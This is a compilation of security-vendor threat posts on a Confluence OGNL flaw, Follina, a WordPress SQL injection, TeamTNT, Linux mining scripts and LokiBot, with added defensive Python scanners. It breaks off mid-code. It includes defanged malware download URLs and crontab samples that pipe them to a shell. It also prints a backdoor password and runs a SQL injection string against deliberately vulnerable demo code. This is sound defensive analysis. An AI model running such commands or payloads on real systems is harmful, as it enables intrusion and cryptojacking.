
Atlassian Confluence OGNL Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Atlassian Confluence is a collaboration platform for building a knowledge base: teams can create, collaborate on and comment on pages for documentation, product requirements and project plans, and share information across teams and the entire company. It is written primarily in Java and runs on a bundled Apache Tomcat application server.

  An OGNL injection has been reported in the Atlassian Confluence Server and Data Center. The vulnerability is due to insufficient input validation leading to OGNL evaluation of user-supplied input.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation can result in remote code execution under the security context of the affected server.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-26134.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 9.3 (E:F/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is functional.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  Confluence uses the Webwork web application framework to map URLs to Java classes, creating what is known as an “action”. Action URLs end with the “.action” suffix and are defined in the xwork.xml file in confluence-.jar and in the atlassian-plugin.xml file in JAR files of included plugins.

  Each action entry contains at least a name attribute, defining the action name, a class attribute, defining the Java class implementing the action, and at least one result element which decides the Velocity template to render after the action is invoked based on the result of the action. Common return values from actions are “error”, “input”, and “success”, but any value may be used as long as there is a matching result element in the associated XWork XML.

  Action entries can contain a method attribute, which allows invocation of a specific method of the specified Java class. When no command is specified, the doDefault() method of the action class is called.

  The following is a sample action entry for the doenterpagevariables action:

  In the above example, the doEnter() method of the com.atlassian.confluence.pages.actions.PageVariablesAction class handles requests to “doenterpagevariables.action” and returns values such as “success”, “input” or “error”, causing the appropriate Velocity template to be rendered. Request-URI paths that end in a slash are mapped to “index.action”.

  The vulnerability is due to insufficient validation of user input that is evaluated during Result calculation. As part of action processing, the action namespace is parsed from the Request-URI path from the start until the last slash. When processing the result of a request in the result class ActionChainResult, the namespace is checked for OGNL expressions and evaluated if found. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request with an OGNL expression in the Request-URI to the target server.
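
  The namespace split described above (everything up to the last slash, with a trailing slash mapping to index.action) is what a defender needs to reproduce in order to spot OGNL markers where they do not belong. The following is an added example, not code from SonicWall or Atlassian: it mimics that split over constructed access-log lines, percent-decodes the namespace repeatedly so double encoding does not hide the marker, and flags requests whose namespace carries the `${` or `%{` expression markers that XWork evaluates. The log format, the sample addresses and the marker list are assumptions.

```python
import re
from urllib.parse import unquote

# Expression markers that XWork/Webwork evaluate as OGNL when they appear in a
# namespace (assumption: both forms are treated as expressions by the framework).
OGNL_MARKER = re.compile(r"[$%]\{")

# Constructed access-log lines (Apache combined format); not real traffic.
LOG_LINES = [
    '10.0.0.5 - - [03/Jun/2022:10:00:00 +0000] "GET /pages/viewpage.action?pageId=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [03/Jun/2022:10:00:01 +0000] "GET /display/DOCS/Home HTTP/1.1" 200 7110',
    '10.0.0.5 - - [03/Jun/2022:10:00:02 +0000] "GET /dosearchsite.action?queryString=%24%7Bfoo%7D HTTP/1.1" 200 3001',
    '198.51.100.7 - - [03/Jun/2022:10:00:03 +0000] "GET /%24%7B1%2B1%7D/ HTTP/1.1" 302 0',
    '198.51.100.7 - - [03/Jun/2022:10:00:04 +0000] "GET /%2524%257B1%252B1%257D/ HTTP/1.1" 302 0',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def split_namespace(path):
    """Mimic Webwork's split of a Request-URI: the namespace is everything up to
    the last '/', the action name is what follows it. A path ending in '/' maps
    to index.action. The query string is not part of the namespace."""
    path = path.split("?", 1)[0]
    idx = path.rfind("/")
    if idx < 0:
        return "", path
    namespace, action = path[:idx], path[idx + 1:]
    return namespace, (action or "index.action")


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding; double encoding is a common way to slip
    past a filter that decodes only once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def namespace_has_ognl(path):
    namespace, _ = split_namespace(path)
    return bool(OGNL_MARKER.search(decode_fully(namespace)))


def scan_access_log(lines):
    """Return one finding per request whose namespace carries an OGNL marker."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        src, ts, method, path, status = m.groups()
        if namespace_has_ognl(path):
            namespace, action = split_namespace(path)
            findings.append({"src": src, "time": ts, "method": method,
                             "namespace": decode_fully(namespace),
                             "action": action, "status": status})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(LOG_LINES):
        print(finding)
```

  The third sample line is deliberately a near miss: the marker sits in the query string, which is never part of the namespace, so a rule that only greps the raw URI for `%24%7B` would raise a false positive there while this check does not.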

Triggering the Problem:

  • The target must have the vulnerable software installed and running.
  • The attacker must have network connectivity to the target service.

Triggering Conditions:

  The attacker sends a malicious HTTP request to the target server with a malicious Request-URI path. The vulnerability is triggered while processing the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2801 Confluence Server and Data Center OGNL Injection RCE 1
  • IPS: 2804 Confluence Server and Data Center OGNL Injection RCE 2
  • IPS: 2806 Confluence Server and Data Center OGNL Injection RCE 3
  • IPS: 2809 Confluence Server and Data Center OGNL Injection RCE 4
  • IPS: 2813 Confluence Server and Data Center OGNL Injection RCE 5

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading the product to a non-vulnerable version.
    • Detecting and filtering malicious traffic using the signatures above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

A look at TeamTNT's latest variant being actively used in the wild

The SonicWall Capture Labs threat research team analyzed the latest cryptomining and infostealing Trojan from the well-known malware group TeamTNT. The group is known to target vulnerable *nix systems and deploy a cryptominer along with a myriad of other tools for reconnaissance and infostealing.

Infection Cycle:

The sample comes as a bash script. To establish a clean slate, upon execution it calls a function that finds, kills and removes all running cryptomining services.

While getting rid of competing cryptominers, it also drops another bash script as a lock file which, when executed, echoes and reads “Forbidden Action!!! TeamTNT is watching you.”

It then sets up its own cryptominer by downloading and installing XMRig, an open source Monero miner.

Upon setup and execution of the cryptominer, a TeamTNT-branded greeting is shown.

It then runs another function, makesshaxx, which installs an SSH key that allows TeamTNT to access the victim machine over SSH.

It then deploys an open source rootkit called Diamorphine, which it uses to hide itself.

The rootkit is embedded as a base64 encoded tar file, which is decoded, decompressed, built and installed.

It is then finally loaded by running the command “insmod diamorphine.ko”.

It also locks down the system to keep full control, deleting existing cron jobs and locking cron.

It also redirects standard output and standard error to /dev/null when the victim tries to shut down or reboot the system.

Finally, it has a function that uses another open source tool, punk.py, an SSH post-exploitation tool that collects usernames, SSH keys and known hosts from a Unix system and then tries to connect via SSH to every combination found.

The Python script is hidden as a base64 encoded value, which once decoded reveals the punk.py tool.
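
Both the rootkit archive and the Python tool described above are carried inside the script as base64 blobs, so a quick triage step is to pull every long base64 run out of a script, decode it and sniff what it is before anything is extracted to disk. The following is an added example written for this post, not SonicWall's or TeamTNT's code: it builds a constructed stand-in for such a dropper (a small tar.gz with placeholder file bodies and a placeholder Python script, both base64-encoded) and then lists the decoded blobs and the archive's member names. The 64-character minimum run length and the magic-byte checks are assumptions.

```python
import base64
import binascii
import io
import re
import tarfile

# A run of at least 64 base64 characters, optionally padded. Short tokens are
# skipped because ordinary shell words (paths, options) rarely reach that length.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def classify(data):
    """Cheap content sniffing by magic bytes; enough to tell an archive from a script."""
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    if len(data) >= 262 and data[257:262] == b"ustar":
        return "tar"
    if data.startswith(b"\x7fELF"):
        return "ELF"
    if data.startswith(b"#!") and b"python" in data[:64]:
        return "python script"
    return "unknown"


def extract_blobs(script_text):
    """Find every long base64 run in a shell script, decode it and sniff its type."""
    blobs = []
    for m in B64_RUN.finditer(script_text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue  # not valid base64 (e.g. a long hex string)
        blobs.append({"offset": m.start(), "kind": classify(raw), "size": len(raw), "data": raw})
    return blobs


def list_archive_members(raw):
    """Member names of a (possibly gzip-compressed) tar blob, read in memory only."""
    with tarfile.open(fileobj=io.BytesIO(raw), mode="r:*") as tf:
        return [member.name for member in tf.getmembers()]


def _build_sample_tgz():
    """Constructed stand-in for the embedded archive; the file bodies are placeholders."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, body in [("diamorphine/Makefile", b"obj-m += diamorphine.o\n"),
                           ("diamorphine/diamorphine.c", b"/* placeholder, not the rootkit source */\n")]:
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tf.addfile(info, io.BytesIO(body))
    return buf.getvalue()


_SAMPLE_PY = b"#!/usr/bin/env python3\nprint('placeholder for the embedded tool')\n"

# Constructed dropper fragment in the style described above: decode, unpack, drop.
SAMPLE_SCRIPT = (
    "#!/bin/bash\n"
    "echo '" + base64.b64encode(_build_sample_tgz()).decode() + "' | base64 -d > /tmp/.d.tgz\n"
    "tar -xzf /tmp/.d.tgz -C /tmp\n"
    "echo '" + base64.b64encode(_SAMPLE_PY).decode() + "' | base64 -d > /tmp/.p.py\n"
)

if __name__ == "__main__":
    for blob in extract_blobs(SAMPLE_SCRIPT):
        print(blob["offset"], blob["kind"], blob["size"])
        if blob["kind"] in ("gzip", "tar"):
            print("  members:", list_archive_members(blob["data"]))
```

Listing members with tarfile in memory, rather than shelling out to tar, avoids writing the attacker's files (and any path traversal tricks in member names) to the analysis host.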

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Coinminer.AIY (Trojan)
  • GAV: XMRig.XMR_13 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Follina MS-MSDT RCE Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  CVE-2022-30190, a.k.a. Follina, is a Microsoft Office zero-day vulnerability that allows applications like Microsoft Word to execute code (without macros) by invoking MSDT (Microsoft Support Diagnostic Tool) routines through the “ms-msdt:/” protocol handler. It was noticed as a zero-day being exploited in the wild, but the technique was first mentioned in 2020 in a rather interesting Bachelor’s Thesis by Benjamin Altpeter, dated August 1st, 2020.

  The thesis describes other ways to execute code from Word via MS protocol handlers, using templates, which still work today. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.

  Bachelor’s Thesis & MSDT

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-30190.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 7.3 (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:F/RL:T/RC:C).

  Base score is 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is local.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is required.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 7.3 (E:F/RL:T/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is functional.
    • The remediation level of this vulnerability is temporary fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The exploit works as follows: the user opens a Microsoft Office file (Word, Excel, RTF, …) that itself contains no malicious code but references a malicious remote HTML template file. The remote file is downloaded and the embedded payload is executed, containing code that abuses the ms-msdt protocol to invoke actions on the compromised host. Look at the “Target=” attribute of the relationship (search for “RDF842”) below:

  
  The host, www[.]xmlformats[.]com, will be visited when you open the document (and activate the content). The following payload will be fetched:

  
  Looking at the right-hand side of the “window.location.href” assignment, the “ms-msdt:/” protocol is being used. MSDT (Microsoft Support Diagnostic Tool), msdt.exe, is a tool provided by Microsoft that collects information to send to Microsoft Support. Microsoft Office will automatically process the MSDT query and execute the payload. The Base64 encoding from above contains the following:

  

  IOC: 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784.
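
  The chain above has two observable stages that do not depend on the payload: a relationship in the document package whose Target points outside the package, and a fetched page carrying an ms-msdt: URI. The following is an added example, not SonicWall's or Microsoft's code, that checks both. It builds a constructed minimal .docx in memory (placeholder host, placeholder relationship Id, no real content), lists every relationship with TargetMode="External" from any .rels part, marks the relationship types Word fetches on its own when the file opens (attachedTemplate, oleObject, image; an assumption about which types auto-fetch), and checks a constructed HTML fragment for the ms-msdt: scheme.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = "{%s}Relationship" % REL_NS
# Relationship types whose external targets Word fetches on its own when the
# document is opened, as opposed to a hyperlink the user has to click (assumption).
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "image"}
MSDT_SCHEME = re.compile(r"ms-msdt:", re.IGNORECASE)


def external_targets(docx_bytes):
    """List every relationship in any .rels part that points outside the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "part": part,
                    "id": rel.get("Id"),
                    "type": rel_type,
                    "target": rel.get("Target"),
                    "auto_fetch": rel_type in AUTO_FETCH_TYPES,
                })
    return findings


def html_invokes_msdt(html_text):
    """True if a fetched template/HTML page carries an ms-msdt: URI anywhere."""
    return bool(MSDT_SCHEME.search(html_text))


def _build_sample_docx():
    """Constructed minimal .docx: one internal relationship (styles) and one external
    oleObject relationship. The target host and the rId are placeholders."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        '<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        'Target="http://template.example.invalid/page.html!" TargetMode="External"/>'
        '</Relationships>' % REL_NS
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


SAMPLE_DOCX = _build_sample_docx()
# Constructed stand-in for the fetched page; only the scheme matters to the check.
SAMPLE_HTML = '<script>window.location.href = "ms-msdt:/id PLACEHOLDER";</script>'

if __name__ == "__main__":
    for finding in external_targets(SAMPLE_DOCX):
        print(finding)
    print("msdt:", html_invokes_msdt(SAMPLE_HTML))
```

  The same walk over .rels parts also surfaces remote-template injection (an external attachedTemplate target), so it is worth running on any inbound Office document regardless of this particular CVE.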

Triggering the Problem:

  • The target system must have the vulnerable Microsoft Office application installed and running.
  • The attacker must have network connectivity to the affected ports.
  • The vulnerability does not work with older Microsoft Office versions.

Triggering Conditions:

  The attacker delivers a generated clickme.docx (or clickme.rtf) payload to the victim, with the remote template served from www/exploit.html. The vulnerability is triggered when the user opens the file.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS
    • SMTP
    • POP3
    • IMAP

SonicWall provides the following protection against this threat:

  This threat is proactively detected by Capture ATP w/RTDMI.

  • IPS: 2771 Microsoft Support Diagnostic Tool RCE (Follina)
  • IPS: 2772 Microsoft Support Diagnostic Tool RCE (Follina)
  • IPS: 2773 Microsoft Support Diagnostic Tool RCE (Follina)
  • IPS: 2774 Microsoft Support Diagnostic Tool RCE (Follina)
  • GAV: CVE-2022-30190.X
  • GAV: CVE-2022-30190.X_1
  • GAV: CVE-2022-30190.X_2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product or applying the vendor-supplied patch.
    • Filtering attack traffic using the signatures above.
    • Following the Microsoft guidance for CVE-2022-30190 below.
  The vendor has released the following patch regarding this vulnerability:
  Vendor Advisory #1 & Vendor Advisory #2

WordPress Photo Gallery Plugin SQL Injection Vulnerability

Overview:

  WordPress is an open source, PHP-based Content Management System (CMS) that offers features such as multiple users, editing, custom formatting of text and an architecture which supports plugins to further extend its functionality. This post looks at the Photo Gallery plugin by 10Web, which has more than 300,000 active installations. The plugin adds responsive, mobile-friendly photo galleries and albums to post content.

  A SQL injection vulnerability has been reported for the Photo Gallery plugin for WordPress. This vulnerability is due to improper input validation for the filter_tag parameter.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. A successful attack may result in remote SQL command execution against the database on the target server.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-1281.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability is due to insufficient sanitization of the filter_tag parameter in requests to /wp-admin/admin-ajax.php when the action parameter is set to GalleryBox. When the server receives a request with action=GalleryBox, the function get_image_rows_data() from photo-gallery/frontend/models/BWGModelGalleryBox.php is called. get_image_rows_data() checks for the presence of the filter_tag parameter; if it is present, each tag is parsed and the results are stored in an array. This array of tags is then used to construct the “where” clause of a SQL query, which is executed with wpdb->get_results() to obtain an array of images. As a result, a maliciously crafted filter_tag parameter can be used to perform a SQL injection attack and extract sensitive information from the underlying database.
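
  The defect described above is a tag array concatenated into a WHERE clause. The following is an added example, not the plugin's PHP, that reproduces the pattern against an in-memory SQLite table and places the hardened form beside it: the vulnerable function splices the tags into an IN (...) list as text, so a single crafted tag rewrites the query and returns an unpublished image from another gallery; the hardened function validates each tag as an integer and binds it with placeholders, so the same input is rejected before any SQL is built. The table layout and the comma-separated form of filter_tag are assumptions.

```python
import sqlite3


def setup_db():
    """Constructed stand-in for the plugin's image table, including one unpublished
    image in another gallery that a correct query must never return."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE images (id INTEGER PRIMARY KEY, filename TEXT,
                             gallery_id INTEGER, published INTEGER, tag_id INTEGER);
        INSERT INTO images VALUES (1, 'a.jpg', 10, 1, 5);
        INSERT INTO images VALUES (2, 'b.jpg', 10, 1, 6);
        INSERT INTO images VALUES (3, 'private.jpg', 99, 0, 7);
    """)
    return conn


def parse_filter_tag(raw):
    """Assumed request shape: filter_tag arrives as one comma-separated string."""
    return [t for t in raw.split(",") if t != ""]


def get_image_rows_vulnerable(conn, gallery_id, filter_tags):
    """The pattern described above: each parsed tag is concatenated into the WHERE clause."""
    where = "gallery_id = %d AND published = 1" % int(gallery_id)
    if filter_tags:
        where += " AND tag_id IN (%s)" % ",".join(filter_tags)  # user-controlled text
    sql = "SELECT filename FROM images WHERE " + where
    return [row[0] for row in conn.execute(sql)]


def get_image_rows_safe(conn, gallery_id, filter_tags):
    """Hardened form: validate every tag as an integer, then bind with placeholders."""
    tags = []
    for tag in filter_tags:
        if not tag.strip().isdigit():
            raise ValueError("invalid filter_tag value: %r" % tag)
        tags.append(int(tag))
    where = "gallery_id = ? AND published = 1"
    params = [int(gallery_id)]
    if tags:
        where += " AND tag_id IN (%s)" % ",".join("?" * len(tags))
        params.extend(tags)
    sql = "SELECT filename FROM images WHERE " + where
    return [row[0] for row in conn.execute(sql, params)]


if __name__ == "__main__":
    db = setup_db()
    print(get_image_rows_vulnerable(db, 10, parse_filter_tag("5,6")))
    # A crafted tag closes the IN (...) list and comments out the rest of the clause,
    # so the gallery and published restrictions no longer apply.
    print(get_image_rows_vulnerable(db, 10, parse_filter_tag("0) OR 1=1 --")))
    try:
        get_image_rows_safe(db, 10, parse_filter_tag("0) OR 1=1 --"))
    except ValueError as err:
        print("rejected:", err)
```

  Binding alone would already prevent the injection; the integer check is kept as well because it gives the request a clear rejection point that can be logged, which is useful input for the IPS signature tuning mentioned below.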

Triggering the Problem:

  • The target system must have the vulnerable WordPress plugin installed and running.
  • The attacker must have network connectivity to the affected ports.

Triggering Conditions:

  The attacker sends a crafted HTTP request to the vulnerable server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

  

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2762 WordPress Photo Gallery plugin SQL Injection 3

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product or applying the vendor-supplied patch.
    • Filtering attack traffic using the signature above.
  The vendor has released the following patch regarding this vulnerability:
  Vendor Advisory

Malicious Linux scripts disable security and install Crypto mining software

The SonicWall Capture Labs threat research team has read reports of a set of malicious scripts, still live online at the time of writing, that install crypto mining software on Linux servers. There are three scripts: fczyo, alduro and sesa.txt. Each script is responsible for a different aspect of getting the mining software up and running. They make every effort to disable various security features that may be present on the system, and they also configure a backdoor so their operators can regain access later.

 

The following web addresses host the scripts and are still live at the time of writing this alert:

  • hxxp://alpenforelle.eu/fczyo
  • hxxp://alpenforelle.eu/alduro
  • hxxp://alpenforelle.eu/sesa.txt

 

fczyo [Detected as: GAV: Linux.Downloader.A (Trojan)] has the following header:

 

fczyo is the main downloader script. It installs itself and the two other scripts into cron under both the current user and root:

 

The contents of /opt/.k/key.txt are sent to a remote server on port 1337 if the file exists. The script also logs the public IP of the infected server to iplogger.org and downloads a file named “ok”, an Ethereum crypto miner [Detected as: Linux.EthMiner.N (Trojan)]:

 

The mining software is made executable and the binary is run. Its output and status are logged to remote servers:

 

The alduro script [Detected as: GAV: Linux.Downloader.A (Trojan)] adds a user named “system” with password “3PvxD3qO8Hx1c” and gives it superuser privileges. It also allows root login via SSH, which is disabled by default on most Linux distributions for security purposes:

 

It installs a public key and sets the appropriate permissions, enabling passwordless authentication when logging in over SSH.

 

The script downloads adnckil [Detected as: GAV: Linux.BitcoinMiner.A (Trojan)]. This is Bitcoin mining software. Upon successful download, execution permissions are set and the mining software is run.

 

The job of sesa.txt is to disable various security features that may be present on the system. It disables outgoing network connections to services related to Alibaba cloud security via the hosts file:

 

If the Alibaba Cloud Aliyun service is running, it is terminated and uninstalled:

 

Any network connections related to these services are severed:

 

The apparmor and aliyun services are permanently disabled:
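
Each of the changes described above (cron entries that fetch the scripts, a second UID 0 account, PermitRootLogin turned on, security vendor hosts sinkholed in /etc/hosts) leaves a trace a host audit can read back from plain files. The following is an added example written for this alert, not SonicWall's tooling: it runs four such checks over constructed copies of /etc/passwd, sshd_config, /etc/hosts and a crontab. The sample contents are made up for the demonstration (the aliyun.com subdomains are placeholders, and the script host is the one named in this alert, kept defanged), and the "first match wins" handling of sshd_config follows OpenSSH's documented behaviour.

```python
import re

# Constructed samples of what the alert describes; none of these are real hosts.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
system:x:0:0::/root:/bin/bash
"""

SAMPLE_SSHD_CONFIG = """# constructed sshd_config fragment
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

SAMPLE_HOSTS = """127.0.0.1 localhost
0.0.0.0 update.aliyun.com
0.0.0.0 agent.aliyun.com
203.0.113.9 intranet.example.invalid
"""

SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/backup.sh
*/5 * * * * curl -fsSL hxxp://alpenforelle.eu/fczyo | bash
*/5 * * * * wget -q -O- hxxp://alpenforelle.eu/sesa.txt | sh
"""


def extra_uid0_accounts(passwd_text):
    """Accounts besides root with UID 0, the way the 'system' user above is created."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


def effective_permit_root_login(sshd_config_text):
    """sshd uses the first value it reads for a keyword, so the first match wins.
    Returns None when the directive is absent (OpenSSH then defaults to prohibit-password)."""
    for line in sshd_config_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"(?i)PermitRootLogin\s+(\S+)", line)
        if m:
            return m.group(1).lower()
    return None


def sinkholed_hosts(hosts_text, watch_domains):
    """/etc/hosts entries that pin a watched domain (or a subdomain of it) to an address."""
    hits = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            if any(name == d or name.endswith("." + d) for d in watch_domains):
                hits.append((ip, name))
    return hits


def download_and_run_cron(crontab_text, hosts):
    """Cron lines that fetch from a listed host and pipe the result into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if (re.search(r"\b(curl|wget)\b", line)
                and re.search(r"\|\s*(ba)?sh\b", line)
                and any(h in line for h in hosts)):
            hits.append(line.strip())
    return hits


def audit():
    """Run all four checks over the constructed samples."""
    return {
        "uid0": extra_uid0_accounts(SAMPLE_PASSWD),
        "permit_root_login": effective_permit_root_login(SAMPLE_SSHD_CONFIG),
        "sinkholed": sinkholed_hosts(SAMPLE_HOSTS, ["aliyun.com"]),
        "cron": download_and_run_cron(SAMPLE_CRONTAB, ["alpenforelle.eu"]),
    }


if __name__ == "__main__":
    for key, value in audit().items():
        print(key, value)
```

On a live system the same functions take the real file contents; the cron check should be run over /etc/crontab, /etc/cron.d and every user's crontab, since the alert notes the scripts install themselves under both the current user and root.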

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Linux.BitcoinMiner.A (Trojan)
  • GAV: Linux.Downloader.A (Trojan)
  • GAV: Linux.EthMiner.N (Trojan)
  • GAV: Linux.Mirai.N_1 (Trojan)

LokiBot is using Living Off The Land Technique

Malware authors always look for ways to keep their malware hidden from security vendors, either by innovating new techniques or by reusing techniques already employed by other malware authors. The SonicWall threat research team has observed LokiBot being delivered to victims’ machines using a Windows Script File (WSF) for the last few weeks. The script file contains a large amount of junk data alongside malicious code that executes a PowerShell script to download a malicious VBS script into the temp folder. The VBS script is then executed, and the temp directory is cleaned up to remove malicious traces:

 

The VBS script is highly obfuscated which executes a PowerShell script with obfuscated arguments:

 

The PowerShell script argument contains a loader binary and a URL. The loader binary is executed with the URL passed as an argument:

 

The loader Dynamic Link Library (DLL) is a .NET compiled binary and its code is simple and tiny. The loader is responsible for loading the LokiBot binary, and if the initial VBS script execution somehow failed, it executes it again: it checks for files with a “.vbs” extension in the Windows temp folder and, if any are present, copies the VBS script to done.vbs and executes it:

 

The loader code contains many reverse operations as an extra layer of protection against security vendors. The loader downloads data from a reversed URL; the downloaded data is then reversed and a few non-ASCII characters are replaced with “A” to obtain a .NET dynamic link library file.

The loader now reverses the argument URL to download and execute the LokiBot binary:
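
The transformation described above (reverse the downloaded bytes, then replace non-ASCII bytes with “A”) is easy to replay offline so that a captured download can be turned back into the DLL and checked before anything is executed. The following is an added example, not the loader's own code or SonicWall's: it applies that transformation, verifies the result has an MZ stub and a PE signature at e_lfanew, and builds its own constructed input by obfuscating a minimal PE-shaped header (not a real DLL) the same way. The reversed URL is a placeholder host and the choice of 0xC3 as the stand-in non-ASCII byte is an assumption.

```python
def reverse_url(text):
    """The loader stores its URL reversed; reversing it again yields the real URL."""
    return text[::-1]


def recover_dll(blob):
    """Apply the transformation described above: reverse the byte order, then replace
    every non-ASCII byte with 'A'."""
    reversed_blob = blob[::-1]
    return bytes(b if b < 0x80 else 0x41 for b in reversed_blob)


def looks_like_pe(data):
    """Sanity check on the result: 'MZ' stub and a 'PE\\0\\0' signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def _build_sample_pe():
    """Constructed minimal PE-shaped header (not a real DLL): MZ stub, e_lfanew = 0x40,
    PE signature, then a few 'A' bytes that the obfuscation will hide."""
    header = bytearray(b"MZ" + b"\x00" * 0x3A)
    header += (0x40).to_bytes(4, "little")
    header += b"PE\x00\x00" + b"AAAA"
    return bytes(header)


def _obfuscate(data):
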